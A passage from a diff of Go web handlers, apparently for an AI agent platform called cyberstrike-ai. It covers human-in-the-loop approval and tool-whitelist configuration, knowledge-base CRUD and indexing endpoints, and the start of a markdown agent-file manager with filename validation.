"decision": req.Decision,
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true})
|
||||
}
|
||||
|
||||
func (h *AgentHandler) DismissHITLInterrupt(c *gin.Context) {
|
||||
var req struct {
|
||||
InterruptID string `json:"interruptId" binding:"required"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(400, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if h.hitlManager == nil {
|
||||
c.JSON(500, gin.H{"error": "hitl manager unavailable"})
|
||||
return
|
||||
}
|
||||
res, err := h.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject',
|
||||
decision_comment='dismissed by user', decided_at=CURRENT_TIMESTAMP
|
||||
WHERE id=? AND status='pending'`, req.InterruptID)
|
||||
if err != nil {
|
||||
c.JSON(500, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
n, _ := res.RowsAffected()
|
||||
if n == 0 {
|
||||
c.JSON(404, gin.H{"error": "interrupt not found or already resolved"})
|
||||
return
|
||||
}
|
||||
// Also drain from in-memory map if present
|
||||
h.hitlManager.mu.Lock()
|
||||
if p, ok := h.hitlManager.pending[req.InterruptID]; ok {
|
||||
delete(h.hitlManager.pending, req.InterruptID)
|
||||
select {
|
||||
case p.decideCh <- hitlDecision{Decision: "reject", Comment: "dismissed by user"}:
|
||||
default:
|
||||
}
|
||||
}
|
||||
h.hitlManager.mu.Unlock()
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true})
|
||||
}
|
||||
|
||||
func (h *AgentHandler) interceptHITLForEinoTool(runCtx context.Context, cancelRun context.CancelCauseFunc, conversationID, assistantMessageID string, sendEventFunc func(eventType, message string, data interface{}), toolName, arguments string) (string, error) {
|
||||
payload := map[string]interface{}{
|
||||
"toolName": toolName,
|
||||
"arguments": arguments,
|
||||
"source": "eino_middleware",
|
||||
"toolCallId": "",
|
||||
}
|
||||
var argsObj map[string]interface{}
|
||||
if strings.TrimSpace(arguments) != "" {
|
||||
_ = json.Unmarshal([]byte(arguments), &argsObj)
|
||||
if argsObj != nil {
|
||||
payload["argumentsObj"] = argsObj
|
||||
}
|
||||
}
|
||||
d, err := h.waitHITLApproval(runCtx, cancelRun, conversationID, assistantMessageID, toolName, "", payload, sendEventFunc)
|
||||
if err != nil || d == nil {
|
||||
return arguments, err
|
||||
}
|
||||
if d.Decision == "reject" {
|
||||
return arguments, multiagent.NewHumanRejectError(d.Comment)
|
||||
}
|
||||
if len(d.EditedArguments) > 0 {
|
||||
edited, mErr := json.Marshal(d.EditedArguments)
|
||||
if mErr == nil {
|
||||
return string(edited), nil
|
||||
}
|
||||
}
|
||||
return arguments, nil
|
||||
}
|
||||
|
||||
|
||||
type hitlConfigReq struct {
|
||||
ConversationID string `json:"conversationId" binding:"required"`
|
||||
HITLRequest
|
||||
}
|
||||
|
||||
func (h *AgentHandler) GetHITLConversationConfig(c *gin.Context) {
|
||||
conversationID := strings.TrimSpace(c.Param("conversationId"))
|
||||
if conversationID == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "conversationId is required"})
|
||||
return
|
||||
}
|
||||
cfg, err := h.hitlManager.LoadConversationConfig(conversationID)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if !hitlStoredConfigEffective(cfg) {
|
||||
if pendMode, ok := h.hitlManager.PendingHITLInterruptMode(conversationID); ok {
|
||||
cfg2 := *cfg
|
||||
cfg2.Enabled = true
|
||||
cfg2.Mode = normalizeHitlMode(pendMode)
|
||||
if cfg2.TimeoutSeconds < 0 {
|
||||
cfg2.TimeoutSeconds = 0
|
||||
}
|
||||
cfg = &cfg2
|
||||
}
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"conversationId": conversationID,
|
||||
"hitl": cfg,
|
||||
"hitlGlobalToolWhitelist": h.hitlConfigGlobalToolWhitelist(),
|
||||
})
|
||||
}
|
||||
|
||||
func (h *AgentHandler) UpsertHITLConversationConfig(c *gin.Context) {
|
||||
var req hitlConfigReq
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
req.Mode = normalizeHitlMode(req.Mode)
|
||||
if err := h.hitlManager.SaveConversationConfig(req.ConversationID, &req.HITLRequest); err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if h.hitlWhitelistSaver != nil && len(req.SensitiveTools) > 0 {
|
||||
if err := h.hitlWhitelistSaver.MergeHitlToolWhitelistIntoConfig(req.SensitiveTools); err != nil {
|
||||
h.logger.Warn("HITL 会话配置已保存,但合并工具白名单到 config.yaml 失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{
|
||||
"error": "会话配置已保存,但写入 config.yaml 失败: " + err.Error(),
|
||||
})
|
||||
return
|
||||
}
|
||||
}
|
||||
h.hitlManager.ActivateConversation(req.ConversationID, h.hitlRequestWithMergedConfigWhitelist(&req.HITLRequest))
|
||||
c.JSON(http.StatusOK, gin.H{"ok": true})
|
||||
}
|
||||
|
||||
type mergeHitlGlobalWhitelistReq struct {
|
||||
SensitiveTools []string `json:"sensitiveTools"`
|
||||
}
|
||||
|
||||
// MergeHITLGlobalToolWhitelist 无会话 ID 时将侧栏提交的免审批工具合并进 config.yaml(与 PUT /hitl/config 中白名单落盘规则一致)。
|
||||
func (h *AgentHandler) MergeHITLGlobalToolWhitelist(c *gin.Context) {
|
||||
if h.hitlWhitelistSaver == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "HITL 配置持久化不可用"})
|
||||
return
|
||||
}
|
||||
var req mergeHitlGlobalWhitelistReq
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if len(req.SensitiveTools) == 0 {
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"ok": true,
|
||||
"hitlGlobalToolWhitelist": h.hitlConfigGlobalToolWhitelist(),
|
||||
"hitlGlobalWhitelistMerged": false,
|
||||
})
|
||||
return
|
||||
}
|
||||
if err := h.hitlWhitelistSaver.MergeHitlToolWhitelistIntoConfig(req.SensitiveTools); err != nil {
|
||||
h.logger.Warn("合并 HITL 工具白名单到 config.yaml 失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"ok": true,
|
||||
"hitlGlobalToolWhitelist": h.hitlConfigGlobalToolWhitelist(),
|
||||
"hitlGlobalWhitelistMerged": true,
|
||||
})
|
||||
}
|
||||
|
||||
func boolToInt(v bool) int {
|
||||
if v {
|
||||
return 1
|
||||
}
|
||||
return 0
|
||||
}
|
||||
@@ -0,0 +1,530 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/knowledge"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// KnowledgeHandler 知识库处理器
|
||||
type KnowledgeHandler struct {
|
||||
manager *knowledge.Manager
|
||||
retriever *knowledge.Retriever
|
||||
indexer *knowledge.Indexer
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *KnowledgeHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewKnowledgeHandler 创建新的知识库处理器
|
||||
func NewKnowledgeHandler(
|
||||
manager *knowledge.Manager,
|
||||
retriever *knowledge.Retriever,
|
||||
indexer *knowledge.Indexer,
|
||||
db *database.DB,
|
||||
logger *zap.Logger,
|
||||
) *KnowledgeHandler {
|
||||
return &KnowledgeHandler{
|
||||
manager: manager,
|
||||
retriever: retriever,
|
||||
indexer: indexer,
|
||||
db: db,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// GetCategories 获取所有分类
|
||||
func (h *KnowledgeHandler) GetCategories(c *gin.Context) {
|
||||
categories, err := h.manager.GetCategories()
|
||||
if err != nil {
|
||||
h.logger.Error("获取分类失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"categories": categories})
|
||||
}
|
||||
|
||||
// GetItems 获取知识项列表(支持按分类分页和关键字搜索,默认不返回完整内容)
|
||||
func (h *KnowledgeHandler) GetItems(c *gin.Context) {
|
||||
category := c.Query("category")
|
||||
searchKeyword := c.Query("search") // 搜索关键字
|
||||
|
||||
// 如果提供了搜索关键字,执行关键字搜索(在所有数据中搜索)
|
||||
if searchKeyword != "" {
|
||||
items, err := h.manager.SearchItemsByKeyword(searchKeyword, category)
|
||||
if err != nil {
|
||||
h.logger.Error("搜索知识项失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 按分类分组结果
|
||||
groupedByCategory := make(map[string][]*knowledge.KnowledgeItemSummary)
|
||||
for _, item := range items {
|
||||
cat := item.Category
|
||||
if cat == "" {
|
||||
cat = "未分类"
|
||||
}
|
||||
groupedByCategory[cat] = append(groupedByCategory[cat], item)
|
||||
}
|
||||
|
||||
// 转换为 CategoryWithItems 格式
|
||||
categoriesWithItems := make([]*knowledge.CategoryWithItems, 0, len(groupedByCategory))
|
||||
for cat, catItems := range groupedByCategory {
|
||||
categoriesWithItems = append(categoriesWithItems, &knowledge.CategoryWithItems{
|
||||
Category: cat,
|
||||
ItemCount: len(catItems),
|
||||
Items: catItems,
|
||||
})
|
||||
}
|
||||
|
||||
// 按分类名称排序
|
||||
for i := 0; i < len(categoriesWithItems)-1; i++ {
|
||||
for j := i + 1; j < len(categoriesWithItems); j++ {
|
||||
if categoriesWithItems[i].Category > categoriesWithItems[j].Category {
|
||||
categoriesWithItems[i], categoriesWithItems[j] = categoriesWithItems[j], categoriesWithItems[i]
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"categories": categoriesWithItems,
|
||||
"total": len(categoriesWithItems),
|
||||
"search": searchKeyword,
|
||||
"is_search": true,
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
// 分页模式:categoryPage=true 表示按分类分页,否则按项分页(向后兼容)
|
||||
categoryPageMode := c.Query("categoryPage") != "false" // 默认使用分类分页
|
||||
|
||||
// 分页参数
|
||||
limit := 50 // 默认每页 50 条(分类分页时为分类数,项分页时为项数)
|
||||
offset := 0
|
||||
if limitStr := c.Query("limit"); limitStr != "" {
|
||||
if parsed, err := parseInt(limitStr); err == nil && parsed > 0 && parsed <= 500 {
|
||||
limit = parsed
|
||||
}
|
||||
}
|
||||
if offsetStr := c.Query("offset"); offsetStr != "" {
|
||||
if parsed, err := parseInt(offsetStr); err == nil && parsed >= 0 {
|
||||
offset = parsed
|
||||
}
|
||||
}
|
||||
|
||||
// 如果指定了 category 参数,且使用分类分页模式,则只返回该分类
|
||||
if category != "" && categoryPageMode {
|
||||
// 单分类模式:返回该分类的所有知识项(不分页)
|
||||
items, total, err := h.manager.GetItemsSummary(category, 0, 0)
|
||||
if err != nil {
|
||||
h.logger.Error("获取知识项失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 包装成分类结构
|
||||
categoriesWithItems := []*knowledge.CategoryWithItems{
|
||||
{
|
||||
Category: category,
|
||||
ItemCount: total,
|
||||
Items: items,
|
||||
},
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"categories": categoriesWithItems,
|
||||
"total": 1, // 只有一个分类
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
if categoryPageMode {
|
||||
// 按分类分页模式(默认)
|
||||
// limit 表示每页分类数,推荐 5-10 个分类
|
||||
if limit <= 0 || limit > 100 {
|
||||
limit = 10 // 默认每页 10 个分类
|
||||
}
|
||||
|
||||
categoriesWithItems, totalCategories, err := h.manager.GetCategoriesWithItems(limit, offset)
|
||||
if err != nil {
|
||||
h.logger.Error("获取分类知识项失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"categories": categoriesWithItems,
|
||||
"total": totalCategories,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
// 按项分页模式(向后兼容)
|
||||
// 是否包含完整内容(默认 false,只返回摘要)
|
||||
includeContent := c.Query("includeContent") == "true"
|
||||
|
||||
if includeContent {
|
||||
// 返回完整内容(向后兼容)
|
||||
items, err := h.manager.GetItemsWithOptions(category, limit, offset, true)
|
||||
if err != nil {
|
||||
h.logger.Error("获取知识项失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取总数
|
||||
total, err := h.manager.GetItemsCount(category)
|
||||
if err != nil {
|
||||
h.logger.Warn("获取知识项总数失败", zap.Error(err))
|
||||
total = len(items)
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"items": items,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
} else {
|
||||
// 返回摘要(不包含完整内容,推荐方式)
|
||||
items, total, err := h.manager.GetItemsSummary(category, limit, offset)
|
||||
if err != nil {
|
||||
h.logger.Error("获取知识项失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"items": items,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// GetItem 获取单个知识项
|
||||
func (h *KnowledgeHandler) GetItem(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
item, err := h.manager.GetItem(id)
|
||||
if err != nil {
|
||||
h.logger.Error("获取知识项失败", zap.Error(err))
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, item)
|
||||
}
|
||||
|
||||
// CreateItem 创建知识项
|
||||
func (h *KnowledgeHandler) CreateItem(c *gin.Context) {
|
||||
var req struct {
|
||||
Category string `json:"category" binding:"required"`
|
||||
Title string `json:"title" binding:"required"`
|
||||
Content string `json:"content" binding:"required"`
|
||||
}
|
||||
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
item, err := h.manager.CreateItem(req.Category, req.Title, req.Content)
|
||||
if err != nil {
|
||||
h.logger.Error("创建知识项失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 异步索引
|
||||
go func() {
|
||||
ctx := context.Background()
|
||||
if err := h.indexer.IndexItem(ctx, item.ID); err != nil {
|
||||
h.logger.Warn("索引知识项失败", zap.String("itemId", item.ID), zap.Error(err))
|
||||
}
|
||||
}()
|
||||
|
||||
c.JSON(http.StatusOK, item)
|
||||
}
|
||||
|
||||
// UpdateItem 更新知识项
|
||||
func (h *KnowledgeHandler) UpdateItem(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
var req struct {
|
||||
Category string `json:"category" binding:"required"`
|
||||
Title string `json:"title" binding:"required"`
|
||||
Content string `json:"content" binding:"required"`
|
||||
}
|
||||
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
item, err := h.manager.UpdateItem(id, req.Category, req.Title, req.Content)
|
||||
if err != nil {
|
||||
h.logger.Error("更新知识项失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 异步重新索引
|
||||
go func() {
|
||||
ctx := context.Background()
|
||||
if err := h.indexer.IndexItem(ctx, item.ID); err != nil {
|
||||
h.logger.Warn("重新索引知识项失败", zap.String("itemId", item.ID), zap.Error(err))
|
||||
}
|
||||
}()
|
||||
|
||||
c.JSON(http.StatusOK, item)
|
||||
}
|
||||
|
||||
// DeleteItem 删除知识项
|
||||
func (h *KnowledgeHandler) DeleteItem(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
if err := h.manager.DeleteItem(id); err != nil {
|
||||
h.logger.Error("删除知识项失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "knowledge", "item_delete", "删除知识项", "knowledge_item", id, nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "删除成功"})
|
||||
}
|
||||
|
||||
// RebuildIndex 重建索引
|
||||
func (h *KnowledgeHandler) RebuildIndex(c *gin.Context) {
|
||||
// 异步重建索引
|
||||
go func() {
|
||||
ctx := context.Background()
|
||||
if err := h.indexer.RebuildIndex(ctx); err != nil {
|
||||
h.logger.Error("重建索引失败", zap.Error(err))
|
||||
}
|
||||
}()
|
||||
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "knowledge", "index_rebuild", "重建知识库索引", "knowledge", "", nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "索引重建已开始,将在后台进行"})
|
||||
}
|
||||
|
||||
// ScanKnowledgeBase 扫描知识库
|
||||
func (h *KnowledgeHandler) ScanKnowledgeBase(c *gin.Context) {
|
||||
itemsToIndex, err := h.manager.ScanKnowledgeBase()
|
||||
if err != nil {
|
||||
h.logger.Error("扫描知识库失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if len(itemsToIndex) == 0 {
|
||||
c.JSON(http.StatusOK, gin.H{"message": "扫描完成,没有需要索引的新项或更新项"})
|
||||
return
|
||||
}
|
||||
|
||||
// 异步索引新添加或更新的项(增量索引)
|
||||
go func() {
|
||||
ctx := context.Background()
|
||||
h.logger.Info("开始增量索引", zap.Int("count", len(itemsToIndex)))
|
||||
failedCount := 0
|
||||
consecutiveFailures := 0
|
||||
var firstFailureItemID string
|
||||
var firstFailureError error
|
||||
|
||||
for i, itemID := range itemsToIndex {
|
||||
if err := h.indexer.IndexItem(ctx, itemID); err != nil {
|
||||
failedCount++
|
||||
consecutiveFailures++
|
||||
|
||||
// 只在第一个失败时记录详细日志
|
||||
if consecutiveFailures == 1 {
|
||||
firstFailureItemID = itemID
|
||||
firstFailureError = err
|
||||
h.logger.Warn("索引知识项失败",
|
||||
zap.String("itemId", itemID),
|
||||
zap.Int("totalItems", len(itemsToIndex)),
|
||||
zap.Error(err),
|
||||
)
|
||||
}
|
||||
|
||||
// 如果连续失败 2 次,立即停止增量索引
|
||||
if consecutiveFailures >= 2 {
|
||||
h.logger.Error("连续索引失败次数过多,立即停止增量索引",
|
||||
zap.Int("consecutiveFailures", consecutiveFailures),
|
||||
zap.Int("totalItems", len(itemsToIndex)),
|
||||
zap.Int("processedItems", i+1),
|
||||
zap.String("firstFailureItemId", firstFailureItemID),
|
||||
zap.Error(firstFailureError),
|
||||
)
|
||||
break
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
// 成功时重置连续失败计数
|
||||
if consecutiveFailures > 0 {
|
||||
consecutiveFailures = 0
|
||||
firstFailureItemID = ""
|
||||
firstFailureError = nil
|
||||
}
|
||||
|
||||
// 减少进度日志频率
|
||||
if (i+1)%10 == 0 || i+1 == len(itemsToIndex) {
|
||||
h.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemsToIndex)), zap.Int("failed", failedCount))
|
||||
}
|
||||
}
|
||||
h.logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)), zap.Int("failedCount", failedCount))
|
||||
}()
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": fmt.Sprintf("扫描完成,开始索引 %d 个新添加或更新的知识项", len(itemsToIndex)),
|
||||
"items_to_index": len(itemsToIndex),
|
||||
})
|
||||
}
|
||||
|
||||
// GetRetrievalLogs 获取检索日志
|
||||
func (h *KnowledgeHandler) GetRetrievalLogs(c *gin.Context) {
|
||||
conversationID := c.Query("conversationId")
|
||||
messageID := c.Query("messageId")
|
||||
limit := 50 // 默认 50 条
|
||||
|
||||
if limitStr := c.Query("limit"); limitStr != "" {
|
||||
if parsed, err := parseInt(limitStr); err == nil && parsed > 0 {
|
||||
limit = parsed
|
||||
}
|
||||
}
|
||||
|
||||
logs, err := h.manager.GetRetrievalLogs(conversationID, messageID, limit)
|
||||
if err != nil {
|
||||
h.logger.Error("获取检索日志失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"logs": logs})
|
||||
}
|
||||
|
||||
// DeleteRetrievalLog 删除检索日志
|
||||
func (h *KnowledgeHandler) DeleteRetrievalLog(c *gin.Context) {
|
||||
id := c.Param("id")
|
||||
|
||||
if err := h.manager.DeleteRetrievalLog(id); err != nil {
|
||||
h.logger.Error("删除检索日志失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "删除成功"})
|
||||
}
|
||||
|
||||
// GetIndexStatus 获取索引状态
|
||||
func (h *KnowledgeHandler) GetIndexStatus(c *gin.Context) {
|
||||
status, err := h.manager.GetIndexStatus()
|
||||
if err != nil {
|
||||
h.logger.Error("获取索引状态失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取索引器的错误信息
|
||||
if h.indexer != nil {
|
||||
lastError, lastErrorTime := h.indexer.GetLastError()
|
||||
if lastError != "" {
|
||||
// 如果错误是最近发生的(5 分钟内),则返回错误信息
|
||||
if time.Since(lastErrorTime) < 5*time.Minute {
|
||||
status["last_error"] = lastError
|
||||
status["last_error_time"] = lastErrorTime.Format(time.RFC3339)
|
||||
}
|
||||
}
|
||||
|
||||
// 获取重建索引状态
|
||||
isRebuilding, totalItems, current, failed, lastItemID, lastChunks, startTime := h.indexer.GetRebuildStatus()
|
||||
if isRebuilding {
|
||||
status["is_rebuilding"] = true
|
||||
status["rebuild_total"] = totalItems
|
||||
status["rebuild_current"] = current
|
||||
status["rebuild_failed"] = failed
|
||||
status["rebuild_start_time"] = startTime.Format(time.RFC3339)
|
||||
if lastItemID != "" {
|
||||
status["rebuild_last_item_id"] = lastItemID
|
||||
}
|
||||
if lastChunks > 0 {
|
||||
status["rebuild_last_chunks"] = lastChunks
|
||||
}
|
||||
// 重建中时,is_complete 为 false
|
||||
status["is_complete"] = false
|
||||
// 计算重建进度百分比
|
||||
if totalItems > 0 {
|
||||
status["progress_percent"] = float64(current) / float64(totalItems) * 100
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, status)
|
||||
}
|
||||
|
||||
// Search 搜索知识库(用于 API 调用,Agent 内部使用 Retriever)
|
||||
func (h *KnowledgeHandler) Search(c *gin.Context) {
|
||||
var req knowledge.SearchRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// Retriever.Search 经 Eino VectorEinoRetriever,与 MCP 工具链一致。
|
||||
results, err := h.retriever.Search(c.Request.Context(), &req)
|
||||
if err != nil {
|
||||
h.logger.Error("搜索知识库失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"results": results})
|
||||
}
|
||||
|
||||
// GetStats 获取知识库统计信息
|
||||
func (h *KnowledgeHandler) GetStats(c *gin.Context) {
|
||||
totalCategories, totalItems, err := h.manager.GetStats()
|
||||
if err != nil {
|
||||
h.logger.Error("获取知识库统计信息失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"enabled": true,
|
||||
"total_categories": totalCategories,
|
||||
"total_items": totalItems,
|
||||
})
|
||||
}
|
||||
|
||||
// 辅助函数:解析整数
|
||||
func parseInt(s string) (int, error) {
|
||||
var result int
|
||||
_, err := fmt.Sscanf(s, "%d", &result)
|
||||
return result, err
|
||||
}
|
||||
@@ -0,0 +1,333 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"regexp"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/agents"
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
)
|
||||
|
||||
var markdownAgentFilenameRe = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9_.-]*\.md$`)
|
||||
|
||||
// MarkdownAgentsHandler 管理 agents 目录下子代理 Markdown(增删改查)。
|
||||
type MarkdownAgentsHandler struct {
|
||||
dir string
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// NewMarkdownAgentsHandler dir 须为已解析的绝对路径。
|
||||
func NewMarkdownAgentsHandler(dir string) *MarkdownAgentsHandler {
|
||||
return &MarkdownAgentsHandler{dir: strings.TrimSpace(dir)}
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *MarkdownAgentsHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
func (h *MarkdownAgentsHandler) safeJoin(filename string) (string, error) {
|
||||
filename = strings.TrimSpace(filename)
|
||||
if filename == "" || !markdownAgentFilenameRe.MatchString(filename) {
|
||||
return "", fmt.Errorf("非法文件名")
|
||||
}
|
||||
clean := filepath.Clean(filename)
|
||||
if clean != filename || strings.Contains(clean, "..") {
|
||||
return "", fmt.Errorf("非法文件名")
|
||||
}
|
||||
return filepath.Join(h.dir, clean), nil
|
||||
}
|
||||
|
||||
// existingOtherOrchestrator 若目录中已有同槽位的其他主代理文件,返回其文件名;writingBasename 为当前正在写入的文件名时不冲突。
|
||||
func existingOtherOrchestrator(dir, writingBasename string) (other string, err error) {
|
||||
load, err := agents.LoadMarkdownAgentsDir(dir)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
wb := filepath.Base(strings.TrimSpace(writingBasename))
|
||||
switch agents.OrchestratorMarkdownKind(wb) {
|
||||
case "plan_execute":
|
||||
if load.OrchestratorPlanExecute != nil && !strings.EqualFold(load.OrchestratorPlanExecute.Filename, wb) {
|
||||
return load.OrchestratorPlanExecute.Filename, nil
|
||||
}
|
||||
case "supervisor":
|
||||
if load.OrchestratorSupervisor != nil && !strings.EqualFold(load.OrchestratorSupervisor.Filename, wb) {
|
||||
return load.OrchestratorSupervisor.Filename, nil
|
||||
}
|
||||
case "deep":
|
||||
if load.Orchestrator != nil && !strings.EqualFold(load.Orchestrator.Filename, wb) {
|
||||
return load.Orchestrator.Filename, nil
|
||||
}
|
||||
default:
|
||||
if load.Orchestrator != nil && !strings.EqualFold(load.Orchestrator.Filename, wb) {
|
||||
return load.Orchestrator.Filename, nil
|
||||
}
|
||||
}
|
||||
return "", nil
|
||||
}
|
||||
|
||||
// ListMarkdownAgents GET /api/multi-agent/markdown-agents
|
||||
func (h *MarkdownAgentsHandler) ListMarkdownAgents(c *gin.Context) {
|
||||
if h.dir == "" {
|
||||
c.JSON(http.StatusOK, gin.H{"agents": []any{}, "dir": "", "error": "未配置 agents 目录"})
|
||||
return
|
||||
}
|
||||
files, err := agents.LoadMarkdownAgentFiles(h.dir)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
out := make([]gin.H, 0, len(files))
|
||||
for _, fa := range files {
|
||||
sub := fa.Config
|
||||
out = append(out, gin.H{
|
||||
"filename": fa.Filename,
|
||||
"id": sub.ID,
|
||||
"name": sub.Name,
|
||||
"description": sub.Description,
|
||||
"is_orchestrator": fa.IsOrchestrator,
|
||||
"kind": sub.Kind,
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"agents": out, "dir": h.dir})
|
||||
}
|
||||
|
||||
// GetMarkdownAgent GET /api/multi-agent/markdown-agents/:filename
|
||||
func (h *MarkdownAgentsHandler) GetMarkdownAgent(c *gin.Context) {
|
||||
filename := c.Param("filename")
|
||||
path, err := h.safeJoin(filename)
|
||||
